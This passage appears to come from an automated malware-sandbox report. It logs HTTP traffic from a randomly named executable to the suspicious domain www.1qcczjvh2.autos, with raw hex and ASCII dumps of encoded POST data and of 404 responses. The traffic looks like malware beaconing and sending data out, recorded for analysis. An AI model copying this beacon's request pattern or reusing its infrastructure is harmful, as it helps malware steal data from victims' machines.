                                                                                                                        Data Ascii: le></head><body><div class="container"><div class="logo"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIE
                                                                                                                        Nov 20, 2024 16:54:28.418788910 CET448INData Raw: 59 37 33 42 72 51 47 72 32 75 44 72 39 4a 4f 4a 78 57 47 36 45 41 56 30 42 42 4f 51 37 78 46 39 4c 54 35 35 38 66 2b 69 52 48 56 59 6d 78 51 41 41 7a 32 46 47 7a 55 70 38 38 31 31 37 7a 44 64 70 54 4c 74 64 45 50 41 31 67 4a 4b 46 4e 46 66 6c 4d
                                                                                                                        Data Ascii: Y73BrQGr2uDr9JOJxWG6EAV0BBOQ7xF9LT558f+iRHVYmxQAAz2FGzUp88117zDdpTLtdEPA1gJKFNFflMXT5CYVVBMAXOChkWczTlx/Zse+bjq9aD5/Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPa
                                                                                                                        Nov 20, 2024 16:54:28.418824911 CET1236INData Raw: 62 76 57 45 56 56 55 57 59 45 59 43 32 4c 75 32 64 68 7a 2f 78 4f 43 7a 33 30 62 71 6f 45 78 78 77 66 64 62 53 37 33 6a 77 6e 4c 31 52 31 51 4d 79 41 58 62 47 52 66 33 79 38 43 68 6e 41 4e 78 58 59 73 67 59 6f 32 54 54 6e 5a 49 51 32 52 30 62 5a
                                                                                                                        Data Ascii: bvWEVVUWYEYC2Lu2dhz/xOCz30bqoExxwfdbS73jwnL1R1QMyAXbGRf3y8ChnANxXYsgYo2TTnZIQ2R0bZs1pbPvCRl8eionHYbmBTefnBQKoW9R5nqPU5GCzF4gKHYEVwnWATrmmdx4Kcms3bkB2WnZhgPfFxJRAWEVbMVpVAamGa3rnIT8eh+Ue6kBOmC0UNc8lo2WFEiDyVdjeXhYVa2+dxYOTTBgSCYAZFZrr0kyWQJit92
                                                                                                                        Nov 20, 2024 16:54:28.418859959 CET1236INData Raw: 6a 4a 54 48 34 6c 66 62 52 63 4a 41 6b 32 2b 6b 38 52 4f 56 74 6e 76 66 67 4d 42 36 48 35 58 70 73 37 76 36 70 4f 43 37 70 63 6e 71 47 43 71 41 67 4f 2b 30 6b 51 34 37 42 65 6f 52 6c 52 38 62 72 41 48 77 48 6f 46 48 2b 34 77 79 6f 6f 51 61 56 54
                                                                                                                        Data Ascii: jJTH4lfbRcJAk2+k8ROVtnvfgMB6H5Xps7v6pOC7pcnqGCqAgO+0kQ47BeoRlR8brAHwHoFH+4wyooQaVTjebo220+2njFZ3+9eqljVd0KgdgJh7VsQIAcBx2XLvDSoIeUcyoCGAVjW1bqDMhec0wwfbdmU+wtw4QJTt2KEWjwjzLLi7E47Bcj01HJPB0LzU9k2A/yj0BYpFfnDkAQgs5riJQw4zcbFsBkDoAI+3c+9/AABRYL6
                                                                                                                        Nov 20, 2024 16:54:28.418915033 CET1236INData Raw: 43 57 7a 70 6c 48 50 37 61 42 2f 44 67 41 6a 77 4f 79 35 55 51 4d 51 43 32 55 6d 42 4d 5a 74 47 55 43 35 56 51 57 42 6d 76 67 6c 67 42 59 4e 6d 52 38 65 30 41 4c 49 47 4e 44 7a 34 52 55 6e 76 57 61 7a 32 47 52 72 51 65 44 49 34 61 32 47 2b 61 6e
                                                                                                                        Data Ascii: CWzplHP7aB/DgAjwOy5UQMQC2UmBMZtGUC5VQWBmvglgBYNmR8e0ALIGNDz4RUnvWaz2GRrQeDI4a2G+anQKJ/1qHJUDIAnDEnh0ByMo1z76ZNr8i0jP7w+ZoiGbQ2HZvA4BO4BUkQLMyYJQDhjQbZgwEm5IOHhzD47BcCWNW2HBYREhnBBPUgv08wsS0K7+e/7QZgJ9hJ1SihJfmE6r2AoNGNUVZR2k2i9pp90v5T+W9kMkAMB
                                                                                                                        Nov 20, 2024 16:54:28.418951035 CET1236INData Raw: 42 71 4e 64 43 31 69 4a 72 43 61 41 6a 67 4b 59 41 79 6a 4d 47 46 63 38 54 71 2b 69 72 47 37 37 6b 77 50 6e 66 39 35 36 2f 50 51 6c 65 36 67 74 49 77 54 32 49 7a 41 76 32 4b 32 2f 2f 69 55 50 44 73 63 34 31 42 31 6a 75 5a 71 56 31 58 50 58 69 73
                                                                                                                        Data Ascii: BqNdC1iJrCaAjgKYAyjMGFc8Tq+irG77kwPnf956/PQle6gtIwT2IzAv2K2//iUPDsc41B1juZqV1XPXisKTUnPRfchg7Puv4Du8qPgHVvAX1/DyzcgBeBjAXwH4A2w1G/TSDUd82z+P+1ykyhocA3M7M7OJTp2oCGCs66NBsPd+gdEktAysy/CFQp5lIlbvlQqe2t9B+FGADWNR/z1k9jCUcCjTZTaL4+vqzU8MxI24gigrt8N
                                                                                                                        Nov 20, 2024 16:54:28.418987036 CET1236INData Raw: 62 33 78 2b 43 58 52 33 35 66 7a 6f 47 6f 35 34 44 30 42 70 41 54 77 44 64 41 4a 51 70 79 70 59 42 34 49 6a 2b 65 4c 71 6b 33 37 43 33 4a 71 32 4d 78 31 50 42 55 31 44 4b 37 38 47 36 34 6a 6c 6f 2b 46 64 78 7a 7a 6f 4e 50 49 55 42 61 4f 39 4d 66
                                                                                                                        Data Ascii: b3x+CXR35fzoGo54D0BpATwDdAJQpypYB4Ij+eLqk37C3Jq2Mx1PBU1DK78G64jlo+FdxzzoNPIUBaO9Mf5yKw+pVL/wCgO9yREvn12o0mXb8J+PrFkk8CAAqjn+tlM5vryF+87MaSWrrp9KMJ9sBfv4A3gbwC4BYg1H/icGo/9fmuZEsTWLzCZ9mMrdnP56/Dqv4qAQyY7fAWFq22VKnkNZzmlauOpiGtewJnnvexi1uAYhwrO
                                                                                                                        Nov 20, 2024 16:54:28.419023991 CET1236INData Raw: 64 47 47 4c 31 46 51 31 47 2f 58 51 41 73 5a 41 56 51 65 78 57 2b 6d 45 41 56 44 79 33 74 37 53 50 72 73 58 49 67 59 76 6e 30 38 67 46 79 2b 43 72 2b 78 35 63 67 61 49 62 48 49 33 41 46 63 73 65 61 47 67 72 35 49 72 6f 41 4c 43 51 4c 59 36 7a 57
                                                                                                                        Data Ascii: dGGL1FQ1G/XQAsZAVQexW+mEAVDy3t7SPrsXIgYvn08gFy+Cr+x5cgaIbHI3AFcseaGgr5IroALCQLY6zWbrOFsVyWDz4WMhPdADwP3X/2i833l9+IDE7bVB+OwZAxfHtG5WucnT+yR3tDide6x2g0fUnIru6Qw/ahrxlbTQY9V8ajHpbI4y/lS41wxkAm3loAGCRxJaRGatKwGx5eLdQFC+fuX+3OssnBKjm+ZhuNSeuQp2Kc2
                                                                                                                        Nov 20, 2024 16:54:28.419063091 CET721INData Raw: 45 6c 2b 59 49 43 4b 6d 48 37 36 55 6b 77 45 2b 72 4a 4a 7a 68 42 6f 42 2f 54 4d 43 75 77 61 69 76 61 6a 44 71 76 77 65 77 46 6e 4b 67 70 32 49 45 6e 74 76 59 73 6b 4b 70 6b 41 2f 37 7a 56 73 62 76 4f 58 59 7a 39 42 70 46 6f 47 6f 56 42 48 6d 56
                                                                                                                        Data Ascii: El+YICKmH76UkwE+rJJzhBoB/TMCuwaivajDqvwewFnKgp2IEntvYskKpkA/7zVsbvOXYz9BpFoGoVBHmV1CZex6bct8Bj4kFzkWzRXHFfk1cJeD3HfJpkBOAHIt58sYLS9871j/2BQZ2uagLeeKa1wkqe2rGse0fj10/84MAta4bOR6/0hFExry0HyWaUG6lS83hIoAD9uwsovjcuaFjfGCxxICAvAV4skpSdQAI0GkmU9feAn


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        3192.168.2.114984443.163.1.110803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:54:29.556777954 CET1816OUTPOST /od8t/ HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Host: www.1qcczjvh2.autos
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 1231
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.1qcczjvh2.autos
                                                                                                                        Referer: http://www.1qcczjvh2.autos/od8t/
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Data Raw: 4b 56 3d 65 55 34 42 51 56 6f 47 51 43 6e 4c 4d 4f 67 30 78 72 4a 30 70 69 2f 4c 32 72 50 38 4e 2f 37 43 47 38 76 76 4d 33 6a 78 37 30 46 68 42 66 6f 64 74 61 45 34 54 70 71 75 67 74 6d 64 59 6a 34 38 31 41 67 4e 73 6d 4f 72 48 73 34 4b 48 70 34 63 66 74 31 79 49 2b 43 33 46 31 44 44 37 74 65 43 64 72 73 33 43 41 4a 4c 4c 35 6f 69 46 45 6f 57 34 38 7a 7a 4a 4f 6e 73 71 39 66 4d 5a 2b 6a 37 31 59 52 61 32 69 33 35 42 38 6b 64 45 50 2f 56 69 4b 79 6a 46 51 5a 42 76 46 61 62 4a 4e 44 39 30 4d 2f 37 74 43 31 79 50 36 4d 50 63 47 6d 61 52 77 45 2b 39 57 57 65 70 6f 46 58 6d 50 53 48 36 71 75 56 36 53 7a 6e 77 78 48 46 53 42 51 62 74 43 42 2f 55 7a 6c 2b 53 7a 6a 41 7a 79 33 79 49 36 35 79 35 71 4f 77 43 43 6e 51 65 4d 76 4c 36 64 51 51 63 45 58 56 4a 33 59 6d 54 51 39 76 4e 73 6c 72 53 46 47 62 65 43 77 48 6d 6b 30 4f 47 6c 7a 6f 2b 61 68 53 6f 4d 41 59 47 76 6d 48 34 30 7a 54 30 47 43 61 50 58 34 75 63 35 56 79 4b 7a 72 79 69 70 79 4a 4d 6b 30 42 61 46 54 56 4d 6a 46 41 6a 55 41 58 75 77 6f 31 4b 62 6f [TRUNCATED]
                                                                                                                        Data Ascii: KV=eU4BQVoGQCnLMOg0xrJ0pi/L2rP8N/7CG8vvM3jx70FhBfodtaE4TpqugtmdYj481AgNsmOrHs4KHp4cft1yI+C3F1DD7teCdrs3CAJLL5oiFEoW48zzJOnsq9fMZ+j71YRa2i35B8kdEP/ViKyjFQZBvFabJND90M/7tC1yP6MPcGmaRwE+9WWepoFXmPSH6quV6SznwxHFSBQbtCB/Uzl+SzjAzy3yI65y5qOwCCnQeMvL6dQQcEXVJ3YmTQ9vNslrSFGbeCwHmk0OGlzo+ahSoMAYGvmH40zT0GCaPX4uc5VyKzryipyJMk0BaFTVMjFAjUAXuwo1KboOLnYIAH2EsCqZu4Pc+R7IsLubeoMzVg0p9D5CWDxxkWhGFWFnRtvWmQ/LwXZLv5ngjCPe8vTI+bvtc105ewNbgedT6tt/u/s0GQfEEqe6Cu3XHNLxhv6Ytx4akEl2bFcBLOPuZG+9W+y4CsMxz1Z2WTr1UpyxBfcmew3GTPkNKSQp4iG7gzlO2cGvhWXgXXYNRUmL2qqJ09Hl0qZoXt9gReW+NqDsdTq6ZZPUleG2x1UtGwFOoszlHCJzOMDiMvorgYbwHL2RElgS7aAizp6qpg4qoAeOzVRHqnGMhLCd8sSmWqAJqANSdDLVIQuK2TjAmzPu74OjsRDR0UBZmO4/xdGDG4pab2SQxTLmkJpJ+fEqQYPf4ZOakcIG8/Rf2c2Lw+fl6bbxUKVYhfriiK57mLvQse/qIh6+AnMIutokCRVADLXpDgKXTEpwfknf5dwi8NuQ7A0uQVCvNWgmDUHiDK9zFm99yULXwOutRWGtuWejXs+31oauL0n2hQm7kcPJEeDv7mOClfvUcKznQL2bS1hOv0hIgi4mWdq4201zAYdLUMKZyr+Apef/4u5UWPl6rUUA4+LouqmeFVVa61x+z6e32mqrvS/ZLL86sal4ihXoLmk0yP2u9ryNocv+NrcTcWRcB6ZRkytKvZLEGI3a9z69zC7Qkx3pY [TRUNCATED]
                                                                                                                        Nov 20, 2024 16:54:31.132139921 CET1236INHTTP/1.1 404 Not Found
                                                                                                                        Server: Tengine
                                                                                                                        Date: Wed, 20 Nov 2024 15:54:30 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Content-Length: 58288
                                                                                                                        Connection: close
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        ETag: "67344967-e3b0"
                                                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f [TRUNCATED]
                                                                                                                        Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]
                                                                                                                        Nov 20, 2024 16:54:31.132210970 CET1236INData Raw: 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d
                                                                                                                        Data Ascii: le></head><body><div class="container"><div class="logo"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIE
                                                                                                                        Nov 20, 2024 16:54:31.132247925 CET1236INData Raw: 59 37 33 42 72 51 47 72 32 75 44 72 39 4a 4f 4a 78 57 47 36 45 41 56 30 42 42 4f 51 37 78 46 39 4c 54 35 35 38 66 2b 69 52 48 56 59 6d 78 51 41 41 7a 32 46 47 7a 55 70 38 38 31 31 37 7a 44 64 70 54 4c 74 64 45 50 41 31 67 4a 4b 46 4e 46 66 6c 4d
                                                                                                                        Data Ascii: Y73BrQGr2uDr9JOJxWG6EAV0BBOQ7xF9LT558f+iRHVYmxQAAz2FGzUp88117zDdpTLtdEPA1gJKFNFflMXT5CYVVBMAXOChkWczTlx/Zse+bjq9aD5/Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPa
                                                                                                                        Nov 20, 2024 16:54:31.132308006 CET1236INData Raw: 4f 41 41 41 45 4a 50 31 79 63 4b 63 4a 6e 4b 49 52 31 68 6b 32 50 54 62 58 6c 73 47 79 49 2b 4d 46 41 42 38 44 47 50 33 62 31 51 73 6a 62 71 65 6e 70 56 51 4e 4c 4e 45 6e 6e 30 6b 75 67 45 4f 4e 56 33 54 36 4e 4c 35 50 39 42 59 46 39 2f 7a 58 38
                                                                                                                        Data Ascii: OAAAEJP1ycKcJnKIR1hk2PTbXlsGyI+MFAB8DGP3b1QsjbqenpVQNLNEnn0kugEONV3T6NL5P9BYF9/zX8dzyjk2IaBKANsi386rV0BEM9WoOwhoa224FgOksKjbDTnNHAdhMYGYM/jX9vFVbwOylS1VW0H0PDuCZErqeirZOEiF57flzAkBKFmSP2jq57Mj4MgDWQRb4C86yWNol7z0SIzGWmM9MC1maZlPjFZ0mNS5DCm7776
                                                                                                                        Nov 20, 2024 16:54:31.132348061 CET896INData Raw: 33 36 30 2b 5a 2b 38 34 72 4f 35 5a 44 78 66 58 4a 64 79 71 4c 4d 61 53 6c 5a 62 44 55 4e 4d 5a 53 62 67 4f 4a 49 42 67 41 48 46 50 51 6a 33 38 63 63 31 71 38 57 45 48 67 2b 4a 6b 41 4b 79 73 42 51 59 77 78 2f 37 4e 4a 31 2f 33 42 6d 42 38 67 6a
                                                                                                                        Data Ascii: 360+Z+84rO5ZDxfXJdyqLMaSlZbDUNMZSbgOJIBgAHFPQj38cc1q8WEHg+JkAKysBQYwx/7NJ1/3BmB8gj2RvZKRfZosnPksjZn4CjfC/IpoSQPiSxrZrxqJi84co2C09n2ayBoPnLtgx4wHySFu7EM8algthDCrYeAjIUdKqVHjpSihoruB0bRyAdjbsTXVLBwynwU1aQCX0KXDOG4RyINQBh5bg0A1gZRX04R+JxJiXRRJ7WC
                                                                                                                        Nov 20, 2024 16:54:31.132385015 CET1236INData Raw: 65 64 2f 57 4f 44 49 47 6a 30 37 62 61 6c 42 67 72 55 7a 55 6f 4b 42 74 79 67 47 39 52 69 46 42 51 6a 65 64 4a 5a 4f 58 4a 79 55 56 56 48 62 4b 4a 77 77 36 72 35 71 49 32 76 6b 45 71 72 65 2f 51 70 73 30 47 54 34 34 64 2f 70 37 42 71 50 63 6b 65
                                                                                                                        Data Ascii: ed/WODIGj07balBgrUzUoKBtygG9RiFBQjedJZOXJyUVVHbKJww6r5qI2vkEqre/Qps0GT44d/p7BqPckeOYhMTEbcrJxUeQwBjOIsx3SwHC7XFj9dJNVqmhnAUQM8PIaQT2eeQYa1YcKurgGsBZW/PNfSb+QyGmQ8yhtQgBMVuvILZc+7YxzN98Be2RD4y84qrbn0lVvnZrfZ6tNBuimtw+1gjFba1hWyClWHgAYjPqyk2KHv/
                                                                                                                        Nov 20, 2024 16:54:31.132421017 CET1236INData Raw: 6c 32 32 7a 70 75 48 76 77 32 46 78 59 78 56 31 46 47 75 57 59 4c 77 56 35 71 63 6f 79 68 6b 4b 6a 70 41 6b 34 39 32 72 74 43 58 50 78 65 74 50 78 41 4e 6b 53 44 45 77 45 38 41 36 4c 4d 74 72 57 62 66 6f 50 30 43 39 6b 68 67 6c 41 58 77 42 6e 37
                                                                                                                        Data Ascii: l22zpuHvw2FxYxV1FGuWYLwV5qcoyhkKjpAk492rtCXPxetPxANkSDEwE8A6LMtrWbfoP0C9khglAXwBn7dkmZ5s+M16fUQ1Xkt5AYaEOPN9s6YxNKQU+y3+d5rgDi09cyIBO3cXOrewlR/9rMRj1jQ1G/STIM6kYAJ9CDmz+c32W57i7Zf10PZYu3dqvbOSPo1DSdyNU3O+4J84Ej1XgsIMt2OWQEq7DDuvdBsMuikzaFnvr2M
                                                                                                                        Nov 20, 2024 16:54:31.132456064 CET1236INData Raw: 37 6f 4b 47 4b 34 35 56 55 31 57 30 43 34 44 4d 41 38 51 61 6a 2f 6e 4f 44 55 56 2b 72 47 50 33 37 75 37 67 46 32 38 47 45 73 45 70 69 62 57 42 48 4a 65 53 61 43 73 71 61 41 4d 44 64 75 6d 57 44 30 36 30 53 65 32 53 71 37 4b 39 52 7a 58 67 36 6f
                                                                                                                        Data Ascii: 7oKGK45VU1W0C4DMA8Qaj/nODUV+rGP37u7gF28GEsEpibWBHJeSaCsqaAMDdumWD060Se2Sq7K9RzXg6oO8dBQvtkSwq9j81HXGEfiGRmQxstBLbTJN5GVsRKSI9+6OHTghcYyAslee5iw8OEQCNIOwhChXB8/Z2ZkUA1xzt+9+NwagvZ4gdPgry4vkiAG1RhKrrAwSeO9uobGCofu2ByS1nbpiGQO+1IHqwpGGFF72Eq5Y6EL
                                                                                                                        Nov 20, 2024 16:54:31.132491112 CET1236INData Raw: 7a 69 39 62 50 43 74 6f 54 34 4f 32 76 31 73 32 39 6d 70 6d 79 59 66 36 4a 75 43 4f 39 79 34 66 55 35 6f 6e 37 7a 51 48 39 44 56 2f 49 32 39 5a 37 44 55 62 39 42 49 4e 52 62 33 4d 52 38 47 2f 6b 42 47 7a 4c 7a 49 41 42 35 64 56 6d 56 67 33 33 6b
                                                                                                                        Data Ascii: zi9bPCtoT4O2v1s29mpmyYf6JuCO9y4fU5on7zQH9DV/I29Z7DUb9BINRb3MR8G/kBGzLzIAB5dVmVg33kn/Jd9iM5Izr11Mz86/dWRpWLPExhTd/GQLfzUaTJshVZDw8zFwUIjddCMKeKwmr2LLZx5GVK69/qfjnPtt0KIUDLgBASS/1byinrQgim5Wh87BZU/LvwrBNrzUY9R8C2A/CFCgYUQF5Uyai3W83rNZw6JIta5cdvr
                                                                                                                        Nov 20, 2024 16:54:31.132525921 CET273INData Raw: 63 32 35 37 38 74 48 2f 4a 46 69 71 65 6e 2b 64 67 4e 33 53 51 30 33 35 69 44 55 61 39 72 62 57 65 78 38 55 65 46 41 78 5a 4b 41 41 44 31 46 65 53 6a 33 5a 43 56 73 34 4f 79 4f 4c 4b 64 7a 4b 74 50 77 5a 62 52 61 6d 79 77 4e 47 4a 31 32 70 50 57
                                                                                                                        Data Ascii: c2578tH/JFiqen+dgN3SQ035iDUa9rbWex8UeFAxZKAAD1FeSj3ZCVs4OyOLKdzKtPwZbRamywNGJ12pPWII6FeeBiq51mMfX7GuPv7LDCtgJ6P0LVmLP1btrjjd5+jukZMb9kZJ+tYyf17wriekh4Dgl5ef/9qm5wahvDmAz5HVNxWu9DIBG4FdVLeHXYtiMtXtodNh2aFX/A8FWHU0TeOqJC2YTBPoRj5ZVO4pC/IMzuE4imb


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        4192.168.2.114985143.163.1.110803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:54:32.214546919 CET507OUTGET /od8t/?KV=TWQhTiU1OhnYN4IGzL5Djgm2xLK+GsutbeycMWjZ529bH9hAjZgdb5GthJXWZD00/RQs8ByXB8t8HO5uPdBuEty+FSeypv/0YqJ9KzFrGa8mXVJ9lffIJok=&Wno=a0qDq HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Host: www.1qcczjvh2.autos
                                                                                                                        Connection: close
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Nov 20, 2024 16:54:33.843769073 CET1236INHTTP/1.1 404 Not Found
                                                                                                                        Server: Tengine
                                                                                                                        Date: Wed, 20 Nov 2024 15:54:33 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Content-Length: 58288
                                                                                                                        Connection: close
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        ETag: "67344967-e3b0"
                                                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f [TRUNCATED]
                                                                                                                        Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]
                                                                                                                        Nov 20, 2024 16:54:33.843786001 CET224INData Raw: 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d
                                                                                                                        Data Ascii: le></head><body><div class="container"><div class="logo"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWR
                                                                                                                        Nov 20, 2024 16:54:33.843801022 CET1236INData Raw: 76 59 6d 55 67 52 6d 6c 79 5a 58 64 76 63 6d 74 7a 49 45 4e 54 4e 75 69 38 73 6f 77 41 41 43 41 41 53 55 52 42 56 48 69 63 37 4a 31 33 65 42 52 56 46 38 62 66 4d 7a 50 62 30 68 4e 4b 36 43 41 67 56 55 43 43 39 4a 4a 51 46 55 52 46 52 51 45 62 58
                                                                                                                        Data Ascii: vYmUgRmlyZXdvcmtzIENTNui8sowAACAASURBVHic7J13eBRVF8bfMzPb0hNK6CAgVUCC9JJQFURFRQEbXRENZUFCh4UYQJHyAYIgxYIgSrHQAskSOoTeq/QSQnrdMnO/PyZoCMnu7GYXC/t7njwhM2fuXLacueWc9xBjDB4eL41XdPIH2Atg9AojVAOQQsAuAL8COBffJ9ryN3fRQx6NV3SqzIAWYKw1EQWDsZsgigawK75PdP
                                                                                                                        Nov 20, 2024 16:54:33.843872070 CET1236INData Raw: 77 42 74 63 7a 30 36 4e 58 39 68 37 78 2b 59 61 75 50 61 66 2f 6b 58 79 2f 70 56 70 46 67 34 66 4d 7a 36 77 46 48 75 47 46 58 50 49 69 6a 57 6e 72 35 38 62 4f 50 74 46 34 48 4a 61 62 32 48 52 75 58 6e 30 41 49 59 57 64 75 35 2b 54 59 62 67 78 65
